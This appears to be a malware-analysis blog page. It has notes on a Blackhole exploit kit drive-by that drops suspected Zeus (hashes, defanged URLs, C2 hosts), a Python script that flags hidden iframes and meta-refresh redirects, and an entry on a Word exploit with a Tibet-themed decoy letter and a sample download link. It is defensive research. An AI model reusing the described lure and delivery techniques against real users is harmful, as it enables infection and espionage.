LIST OF FILES INCLUDED
│   investigation_notes.txt

├───dropped_files
│   ├───exe
│   │       hnszs0.exe
│   │       KB971033.exe
│   │
│   ├───java
│   │       jar_cache.zip
│   │
│   ├───pdf
│   │       ap1.pdf
│   │       ap2.pdf
│   │
│   └───swf
│           score.swf

├───email
│       MSUPDATE.eml

├───extracted_files
│       pid_1412_Explorer_Dumped.EXE

├───html
│       exploit.html
│       landing.html

└───pcap
        dump.pcap



Quick analysis made by Bryan Nolen

Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=3D1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )

Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.

Analysis of the javascript was performed with the assistance of the URLQUERY report (http://urlquery.net/report.php?id=47909).

The attack payloads are saved as
  • dropped_files/pdf/ap1.pdf 
  • dropped_files/pdf/ap2.pdf 
  • dropped_files/swf/score.swf 
  • dropped_files/java/jar_cache.zip

The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )

A copy of explorer.exe extracted from the memory image after infection is included, based on observations this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)

PCAP is supplied in the pcap folder. The hosts identified in this malware are:

Landing Page:    volozhin.gov.by         212.98.162.62
Exploit Page:    fewfewfewfew.ibiz.cc         83.69.233.156
C2:        google-analytics-sv1.com     91.230.147.222
(alt C2):    localdomain01.com         91.230.147.145

Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.

Full memory dumps from my sandbox VM available on request.

I have a strong suspicion this is a Zeus variant.


-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>
@bryannolen

SITE TYPE     IP     HOST     COUNTRY     AS
LEGITIMATE, COMPROMISED     212.98.162.62     volozhin.gov.by     Belarus     AS12406 Business network j.v. (Business Network JV)
BLACKHOLE     83.69.233.156     fewfewfewfew.ibiz.cc     Russian Federation     AS28762 AWAX Telecom Ltd.
PAYLOAD - ZEUS, C2     91.230.147.222     google-analytics-sv1.com     Russian Federation     AS57189 PE Spiridonova Vera Ana (OOO Aldevir Invest)
PAYLOAD - ZEUS, C2 (alt)     91.230.147.145     localdomain01.com     Russian Federation     AS57189 PE Spiridonova Vera Ana (OOO Aldevir Invest)
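The landing page described above uses two classic redirection tricks: a hidden IFRAME that pulls in the exploit kit page, and a META REFRESH that hands the victim the fake "update" binary. As an added example (not part of the original post and not Bryan Nolen's code), the script below performs that static triage on a saved page: it resolves both kinds of target against the page URL and prints them defanged in the hxxp:// style the post uses. The input is a constructed HTML snippet modelled on the description, not the real landing.html from the archive; the hostnames and paths are the ones given in the post, while the hiding heuristics (display:none, visibility:hidden, zero or one-pixel size, large negative offsets) are assumptions made here about how such frames are typically hidden.

```python
"""Static triage of a Blackhole-style landing page (added example).

Reports (1) IFRAMEs hidden via style or size attributes and (2) META
http-equiv="refresh" redirects, with targets resolved against the page URL
and defanged (http -> hxxp) so they are safe to paste into notes.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Heuristics for a "hidden" frame: assumptions made here, not from the post.
_HIDDEN_CSS = ("display:none", "visibility:hidden")
_ZERO_SIZE_CSS = re.compile(r"(?:width|height):(?:0|1)(?:px)?(?:;|$)")
_OFFSCREEN_CSS = re.compile(r"(?:left|top):-\d{3,}px")
_REFRESH = re.compile(r"\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"]+)", re.IGNORECASE)


def is_hidden_iframe(attrs):
    """True if the iframe's attributes suggest the user is not meant to see it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(tok in style for tok in _HIDDEN_CSS):
        return True
    if _ZERO_SIZE_CSS.search(style) or _OFFSCREEN_CSS.search(style):
        return True
    for key in ("width", "height"):          # width="1" height="1" style frames
        val = attrs.get(key, "").strip().lower().rstrip("px")
        if val.isdigit() and int(val) <= 1:
            return True
    return False


def refresh_target(content):
    """Extract the URL from a meta refresh content value such as '0;url=x.exe'."""
    m = _REFRESH.match(content)
    return m.group(1).strip() if m else None


def defang(url):
    """http:// -> hxxp:// (the convention used in the post)."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)


class _LandingPageParser(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.hidden_iframes = []
        self.meta_refresh = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and a.get("src") and is_hidden_iframe(a):
            self.hidden_iframes.append(urljoin(self.base_url, a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            target = refresh_target(a.get("content", ""))
            if target:
                self.meta_refresh.append(urljoin(self.base_url, target))


def triage_landing_page(html, base_url):
    """Return defanged hidden-iframe and meta-refresh targets found in html."""
    p = _LandingPageParser(base_url)
    p.feed(html)
    p.close()
    return {
        "hidden_iframes": [defang(u) for u in p.hidden_iframes],
        "meta_refresh": [defang(u) for u in p.meta_refresh],
    }


# Constructed sample modelled on the landing page described in the post; it is
# NOT the real landing.html from the archive. One 1x1 hidden frame to the
# exploit kit, one ordinary visible frame, and a refresh to the fake update.
SAMPLE_BASE = "http://volozhin.gov.by/pub/KB971033/"
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="5;url=KB971033.exe">
</head><body>
<h1>Microsoft Security Update KB971033</h1>
<iframe src="http://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486"
        width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="http://example.com/visible-frame" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, urls in triage_landing_page(SAMPLE_HTML, SAMPLE_BASE).items():
        for u in urls:
            print(f"{kind}: {u}")
```

Run it against html/landing.html from the archive by reading the file into `triage_landing_page` with the landing URL as `base_url`; relative refresh targets such as KB971033.exe only resolve correctly when the base URL is the directory the page was served from. The visible 600x400 frame in the sample is deliberately left out of the report so that the heuristics are exercised in both directions.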





019 - APT - speech.doc - MacOS_X/MS09-027.A (CVE-2009-0563) Word exploit with Mac OS X payload

Someone uploaded it. Thank you for sharing.
The document language code is Arabic, which is kind of interesting.

Research: Microsoft, "An interesting case of Mac OSX malware"


 Download (pass infected)

File: speech.doc
Size: 158854
MD5:  F4CBFE4F2DDF3F599984CF6D01C1B781


The text of the decoy (clean doc) message:
Your Excellency
The United Nations Commission for Human Rights
The United Nations Commission for Human Rights Office
Geneva, Switzerland.
Dated: 9th March 2012.
Your Excellency,
The Tibetans throughout the Globe will commemorate the 53rd Anniversary of the Tibetan National Uprising Day in Lhasa, Tibet in 1959, against the Peoples Republic of China. During these 53 long years of struggle, thousands of innocent Tibetans were tortured, imprisoned and killed by the Chinese government, without a fair trial. Tibet's rich resources are plundered and the environment destroyed with deforestation, elimination of its rare species of wildlife and diverting and damming of Tibet's holy rivers which are source of lifeline for many Asian countries.
Since 2008, massive crackdowns and indoctrination of Tibetan monks and nuns were imposed by the Chinese Government. Due to heavy handedness of the Chinese authorities, and the unbearable condition of the Tibetans under their most repressive rule, the Tibetans from all parts of Tibet, especially Ngaba and Karzi regions unitedly protested, demanding the return of Tibet's spiritual leader H.Holiness the Dalai Lama and freedom for Tibet. Instead of addressing the problems being faced by the Tibetans under the Chinese repressive rule in Tibet, the Chinese authorities sought to use forceful methods by firing on unarmed Tibetan protestors, beating and injuring them. Since 16th March 2011, over 24 Tibetans have self-immolated, calling for return of Tibet's spiritual leader H.Holiness the Dalai Lama and freedom for Tibet. In short, Tibet is cut off from outside world, with ban on the entry of foreign media personnel and tourists.
We therefore, appeal to your Excellency and the representatives of the United Nations member countries to take immediate action on the following demands:-
1) Insist the Peoples Republic of China to immediately call back all Chinese Security personnel from Ngaba and Karzi regions of Tibet.
2) All the monks and nuns must be allowed to return unconditionally to their respective monasteries
3) Insist the Chinese authorities to release all the political prisoners, especially the young Panchen Lama, Gedun Choekyi Nyima and Tulku Tenzin Delek
4) Allow foreign diplomats and independent media unfettered access to all the Tibetan areas for observation
Stop all forms of persecution in Tibet and adhere to Global Human Rights norms.
Your Excellency, we Tibetans inside Tibet and in other parts of the world, appeal and look forward eagerly to genuine political support from the United Nations like any other weaker nations who are facing tremendous aggression from more powerful nations in the world.
As you are aware, we Tibetans, under the leadership of His Holiness the Dalai Lama, the non-violent and compassionate leader who follows non-violent even to last resort, continue to follow His steps to gain Freedom for the Tibetans.
Thanking you,
With due respect and hope,
TENZIN WANGMO                                                            PHURBU LHAMO
      President                                                                            President
RTWA   Bylakuppe, Karnataka State                             RTWA Kollegal, Karnataka State
xicp.net - registrant (whois)

Shanghai Best Oray Information S&T Co., Ltd. (yezi@oray.com)
1st Floor of No. 15 Jian Gong Road, Tianhe District, Guangzhou, 510665, China
Tel. +86.2061073384
Fax. +86.20


Virustotal
SHA256:     6a70e797617bb8958bfbe94a42374447e3859c6b4ef1e108d43a30b5db74480b
SHA1:     445959611bc2480357057664bb597c803a349386
MD5:     f4cbfe4f2ddf3f599984cf6d01c1b781
File size:     155.1 KB ( 158854 bytes )
File name:     speech.doc
File type:     MS Word Document
Detection ratio:     27 / 42
Analysis date:     2012-05-04 02:00:26 UTC ( 48 minutes ago )
AhnLab-V3     Dropper/Ms09-027     20120503
AntiVir     EXP/CVE-2009-0563.A     20120504
Antiy-AVL     Exploit/MSWord.CVE-2009-0563     20120504
Avast     MacOS:DocDrop-A [Expl]     20120504
BitDefender     Exploit.CVE-2009-0563.Gen     20120504
ClamAV     OSX.Word.Malware     20120504
Comodo     UnclassifiedMalware     20120503
DrWeb     Exploit.MS09-027.1     20120504
Emsisoft     Exploit.MS04.CVE-2004-0210-2009-0563.A!IK     20120504
eTrust-Vet     OSX/MS09-027!exploit     20120503
F-Secure     Exploit:OSX/MS09027.A     20120504
Fortinet     W97M/CVE_2009_0563.A!exploit     20120504
GData     Exploit.CVE-2009-0563.Gen     20120504
Ikarus     Exploit.MS04.CVE-2004-0210-2009-0563.A     20120504
Kaspersky     Exploit.MSWord.CVE-2009-0563.a     20120504
McAfee     Exploit-MSWord.m     20120503
McAfee-GW-Edition     Heuristic.BehavesLike.Exploit.W97.CodeExec.O     20120503
Microsoft     Exploit:MacOS_X/MS09-027.A     20120503
NOD32     OSX/Exploit.MSWord.CVE-2009-0563.A     20120504
nProtect     Exploit.CVE-2009-0563.Gen     20120503
PCTools     Trojan.Mdropper     20120504
Sophos     Troj/DocOSXDr-A     20120504
SUPERAntiSpyware     -     20120411
Symantec     Trojan.Mdropper     20120504
TrendMicro     TROJ_MDROPR.LB     20120503
TrendMicro-HouseCall     -     20120504
VIPRE     Trojan.Msword.Mdropper.a (v)     20120503
VirusBuster     Exploit.CVE-2009-0563.Gen     20120503


ssdeep
1536:KgyNLrsGpdccCBOdK4TaC5V7dMorYjTBGI:ONPsGpe4TaCf7c
TrID
Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
ExifTool

SharedDoc................: No
Author...................: captain
HyperlinksChanged........: No
LinksUpToDate............: No
LastModifiedBy...........: captain
HeadingPairs.............: Title, 1
Template.................: Normal.dotm
CharCountWithSpaces......: 0
CreateDate...............: 2010:08:22 10:37:00
CompObjUserType..........: Microsoft Office Word 97-2003 Document
ModifyDate...............: 2010:08:22 10:37:00
TitleOfParts.............:
Company..................:
Characters...............: 0
ScaleCrop................: No
CodePage.................: Windows Arabic
RevisionNumber...........: 2
MIMEType.................: application/msword
Words....................: 0
FileType.................: DOC
Lines....................: 1
AppVersion...............: 12.0
Security.................: None
Software.................: Microsoft Office Word
TotalEditTime............: 0
Pages....................: 1
CompObjUserTypeLen.......: 39
Paragraphs...............: 1


File names (as submitted):
   1. speech.doc
   2. 1.do
   3. 1.doc
   4. file-3831515_
   5. 6a70e797617bb8958bfbe94a42374447e3859c6b4ef1e108d43a30b5db74